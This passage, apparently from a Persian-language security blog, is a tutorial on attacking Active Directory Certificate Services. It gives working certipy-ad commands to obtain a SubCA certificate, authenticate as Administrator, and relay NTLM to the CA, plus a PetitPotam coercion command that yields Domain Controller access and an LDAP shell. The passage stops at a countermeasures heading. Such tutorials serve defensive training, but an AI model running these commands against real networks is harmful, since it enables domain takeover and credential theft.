\u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u067e\u0633 \u0627\u0632 \u062f\u0631\u06cc\u0627\u0641\u062a\u060c \u0627\u06cc\u0646 \u06af\u0648\u0627\u0647\u06cc \u062f\u0631 \u0646\u0642\u0634 \u06cc\u06a9 Subordinate Certification Authority (SubCA) \u0639\u0645\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0628\u0647 \u062f\u0627\u0631\u0646\u062f\u0647 \u0622\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u0628\u0647\u200c\u0637\u0648\u0631 \u0645\u0633\u062a\u0642\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u0635\u0627\u062f\u0631 \u0648 \u0627\u0645\u0636\u0627 \u06a9\u0646\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad req -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -template SubCA -retrieve 26 -dc-ip 192.168.1.20<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0633\u06cc\u0631 Privilege Escalation \u0627\u0632 \u0637\u0631\u06cc\u0642 SubCA \u0631\u0627 \u0646\u0647\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0628\u0627 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0634\u062a\u0646 \u0627\u06cc\u0646 \u06af\u0648\u0627\u0647\u06cc\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc\u2014\u0645\u0627\u0646\u0646\u062f Administrator \u06cc\u0627 Domain Controller\u2014\u06af\u0648\u0627\u0647\u06cc \u0645\u0639\u062a\u0628\u0631 \u062a\u0648\u0644\u06cc\u062f \u06a9\u0646\u062f \u0648 \u0639\u0645\u0644\u0627\u064b \u0646\u0642\u0634 \u06cc\u06a9 CA \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645 (Attacker-Controlled Certification Authority) \u0631\u0627 \u062f\u0631 \u0645\u062d\u06cc\u0637 \u0627\u06cc\u0641\u0627 \u0646\u0645\u0627\u06cc\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19909\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/31-300x53.png\" alt=\"\" width=\"543\" height=\"96\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/31-300x53.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/31-1024x180.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/31-768x135.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/31-1536x270.png 1536w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/31-150x26.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/31.png 1594w\" sizes=\"(max-width: 543px) 100vw, 543px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647<\/strong><strong>:<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062a\u0648\u0627\u0644\u06cc \u0646\u0634\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u0633\u0637\u0648\u062d \u062f\u0633\u062a\u0631\u0633\u06cc CA\u060c \u0627\u0632 \u0634\u06a9\u0633\u062a \u0627\u0648\u0644\u06cc\u0647 \u062f\u0631 \u0645\u062c\u0648\u0632\u0647\u0627 \u0639\u0628\u0648\u0631 \u06a9\u0631\u062f\u0647 \u0648 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0648\u0641\u0642\u06cc\u062a\u200c\u0622\u0645\u06cc\u0632 \u0645\u0633\u06cc\u0631 \u062d\u0645\u0644\u0647\u200c\u06cc Post-Exploitation \u0631\u0627 \u062f\u0646\u0628\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc<\/strong><strong> Administrator<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0627\u06cc\u0644 \u06af\u0648\u0627\u0647\u06cc .pfx\u060c \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647 Active Directory \u0627\u0632 \u0637\u0631\u06cc\u0642 Kerberos \u06cc\u0627 Schannel \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u0631\u0648\u0634\u060c \u0646\u06cc\u0627\u0632\u06cc \u0628\u0647 \u0648\u0627\u0631\u062f \u06a9\u0631\u062f\u0646 \u06af\u0630\u0631\u0648\u0627\u0698\u0647 \u0646\u062f\u0627\u0631\u062f \u0648 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0648\u0631\u062f \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u067e\u0630\u06cc\u0631\u0641\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.20<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0648\u0631\u0648\u062f \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0628\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc Domain Administrator \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f\u061b \u0686\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc \u062c\u0639\u0644\u06cc \u0627\u06cc\u062c\u0627\u062f\u0634\u062f\u0647 \u0628\u0627 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc CA\u060c \u06cc\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 SubCA \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645. \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0633\u0631\u0642\u062a \u06cc\u0627 \u06a9\u0631\u06a9 \u06a9\u0631\u062f\u0646 \u0631\u0645\u0632\u0639\u0628\u0648\u0631\u060c \u0628\u0647 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u062f\u0627\u0645\u0646\u0647 \u062f\u0633\u062a \u0645\u06cc\u200c\u06cc\u0627\u0628\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19910\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/32-300x74.png\" alt=\"\" width=\"535\" height=\"132\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/32-300x74.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/32-1024x251.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/32-768x188.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/32-150x37.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/32.png 1361w\" sizes=\"(max-width: 535px) 100vw, 535px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u06a9\u0644\u06cc\u062f\u0647\u0627\u06cc<\/strong><strong> CA <\/strong><strong>\u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0646\u06cc\u0633\u062a\u0646\u062f<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0634\u0631\u0627\u06cc\u0637\u06cc \u06a9\u0647 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc CA \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0645\u0647\u0627\u062c\u0645 \u0646\u06cc\u0633\u062a\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc Network Coercion \u0648 Relay Attacks \u0628\u0647 \u0646\u062a\u0627\u06cc\u062c\u06cc \u0645\u0634\u0627\u0628\u0647 \u062f\u0633\u062a \u06cc\u0627\u0641\u062a\u2014\u06cc\u0639\u0646\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Domain Controller\u2014\u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06cc\u0627 \u062f\u06cc\u06af\u0631 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u06a9\u0627\u0631\u0628\u0631\u06cc.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0631\u0644\u0647 \u06a9\u0631\u062f\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647 \u0633\u0645\u062a<\/strong><strong> CA<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u06cc\u06a9 Relay Server \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0628\u0647 Web Enrollment Endpoint \u0645\u062a\u0639\u0644\u0642 \u0628\u0647 Certification Authority \u0645\u062a\u0635\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0627\u0632 \u0642\u0627\u0644\u0628\u06cc (Template) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0631\u0627 \u0635\u0627\u062f\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0645\u0627\u0646\u0646\u062f \u0642\u0627\u0644\u0628 DomainController.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad relay -target 192.168.1.17 -template DomainController<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0633\u06cc\u0633\u062a\u0645 \u0631\u0627 \u0622\u0645\u0627\u062f\u0647 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u062a\u0627 \u06cc\u06a9 \u0627\u0631\u062a\u0628\u0627\u0637 NTLM coerced (\u062a\u062d\u0645\u06cc\u0644\u06cc) \u0631\u0627 \u0627\u0632 \u06cc\u06a9 Domain Controller \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19911\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/33-300x70.png\" alt=\"\" width=\"583\" height=\"136\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/33-300x70.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/33-768x178.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/33-150x35.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/33.png 893w\" sizes=\"(max-width: 583px) 100vw, 583px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0648\u0627\u062f\u0627\u0631 \u06a9\u0631\u062f\u0646<\/strong><strong> Domain Controller <\/strong><strong>\u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> PetitPotam<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0627\u0632 \u0627\u0628\u0632\u0627\u0631 PetitPotam \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06cc\u06a9 \u062d\u0645\u0644\u0647 Coercion \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06cc\u06a9 Domain Controller \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0646\u0627\u062e\u0648\u0627\u0633\u062a\u0647 \u0628\u0647 Relay Server \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u067e\u0631\u0648\u062a\u06a9\u0644\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f MS-EFSRPC \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">python PetitPotam.py -u raj -p Password@1 192.168.1.12 192.168.1.14<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f1\u06f2 \u0622\u062f\u0631\u0633 IP \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Domain Controller \u0647\u062f\u0641 \u0627\u0633\u062a.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f1\u06f4 \u0622\u062f\u0631\u0633 IP \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Relay Server \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0627\u0639\u062b \u0627\u0631\u0633\u0627\u0644 \u06cc\u06a9 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a NTLM \u0627\u0632 \u0633\u0648\u06cc Domain Controller \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u0627\u0631\u062a\u0628\u0627\u0637 NTLM \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0648\u0633\u0637 \u0645\u0647\u0627\u062c\u0645 Capture \u0634\u062f\u0647 \u0648 \u0628\u0647 Certification Authority (CA) \u0631\u0644\u0647 (Relay) \u0634\u0648\u062f \u062a\u0627 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u062c\u0639\u0644\u06cc \u0648 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a PKI \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06af\u0631\u062f\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19912\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/34-300x209.png\" alt=\"\" width=\"522\" height=\"364\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/34-300x209.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/34-1024x713.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/34-768x534.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/34-150x104.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/34.png 1082w\" sizes=\"(max-width: 522px) 100vw, 522px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062c\u0627\u06cc\u06af\u0632\u06cc\u0646: \u0627\u062c\u0631\u0627\u06cc \u0645\u062c\u062f\u062f \u062d\u0645\u0644\u0647<\/strong><strong> Relay <\/strong><strong>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> Certipy<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0627\u062a\u0635\u0627\u0644 \u0646\u0627\u067e\u0627\u06cc\u062f\u0627\u0631 \u0628\u0627\u0634\u062f \u06cc\u0627 \u062a\u0644\u0627\u0634 \u0627\u0648\u0644\u06cc\u0647 \u0628\u0631\u0627\u06cc Coercion \u0645\u0648\u0641\u0642\u06cc\u062a\u200c\u0622\u0645\u06cc\u0632 \u0646\u0628\u0648\u062f\u0647 \u0628\u0627\u0634\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0645\u062c\u062f\u062f\u0627\u064b \u062f\u0633\u062a\u0648\u0631 Relay \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0631\u062f \u062a\u0627 \u0633\u0631\u0648\u0631 \u0631\u0644\u0647 \u0641\u0639\u0627\u0644 \u0628\u0627\u0642\u06cc \u0628\u0645\u0627\u0646\u062f \u0648 \u0641\u0631\u0622\u06cc\u0646\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u062a\u06a9\u0645\u06cc\u0644 \u0634\u0648\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad relay -target 192.168.1.17 -template DomainController<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0633\u0631\u0648\u0631 \u0631\u0644\u0647 \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06cc\u0627 \u062f\u0631 \u0648\u0636\u0639\u06cc\u062a \u0622\u0645\u0627\u062f\u0647\u200c\u0628\u0627\u0634 \u0646\u06af\u0647 \u0645\u06cc\u200c\u062f\u0627\u0631\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0628\u0647 \u0642\u0627\u0644\u0628 DomainController \u0645\u062a\u0635\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0635\u0627\u062f\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0631\u0648\u0634 \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc\u06cc \u0628\u0627 \u0627\u062a\u0635\u0627\u0644 \u0646\u0627\u067e\u0627\u06cc\u062f\u0627\u0631 \u0634\u0628\u06a9\u0647 \u06cc\u0627 \u0645\u0648\u0627\u0631\u062f\u06cc \u06a9\u0647 \u062a\u0644\u0627\u0634 \u0627\u0628\u062a\u062f\u0627\u06cc\u06cc \u0628\u0631\u0627\u06cc \u0648\u0627\u062f\u0627\u0631\u0633\u0627\u0632\u06cc Domain Controller \u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a (NTLM Coercion) \u0628\u0627 \u0634\u06a9\u0633\u062a \u0645\u0648\u0627\u062c\u0647 \u0634\u062f\u0647\u060c \u0628\u0633\u06cc\u0627\u0631 \u0645\u0641\u06cc\u062f \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19913\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/35-300x114.png\" alt=\"\" width=\"550\" height=\"209\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/35-300x114.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/35-1024x390.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/35-768x292.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/35-150x57.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/35.png 1101w\" sizes=\"(max-width: 550px) 100vw, 550px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646<\/strong><strong> Domain Controller<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631\u0634\u062f\u0647 \u0628\u0631\u0627\u06cc Domain Controller\u060c \u0641\u0631\u0622\u06cc\u0646\u062f \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 PKINIT (Public Key Cryptography for Initial Authentication in Kerberos) \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f \u0648 \u06cc\u06a9 \u0646\u0634\u0633\u062a LDAP \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Domain Controller \u0622\u063a\u0627\u0632 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad auth -pfx dc1.pfx -dc-ip 192.168.1.14 -ldap-shell<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0627\u0632 \u0641\u0627\u06cc\u0644 .pfx \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06af\u0648\u0627\u0647\u06cc Domain Controller \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0627 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u06a9\u0627\u0645\u0644 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u06cc\u06a9 LDAP Shell \u0645\u0639\u062a\u0628\u0631 \u0628\u0627 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc Domain Controller \u0628\u0631\u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0628\u0627 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a DCSync \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0647\u0634\u200c\u0647\u0627\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 Active Directory \u2014 \u0634\u0627\u0645\u0644 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0633\u0637\u062d \u0628\u0627\u0644\u0627 \u0645\u0627\u0646\u0646\u062f Enterprise Admins \u2014 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f. \u0627\u06cc\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0639\u0627\u062f\u0644 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0628\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19914\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/36-300x107.png\" alt=\"\" width=\"527\" height=\"188\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/36-300x107.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/36-768x275.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/36-150x54.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/36.png 955w\" sizes=\"(max-width: 527px) 100vw, 527px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0645\u0642\u0627\u0628\u0644\u0647\u200c\u0627\u06cc<\/strong><strong> 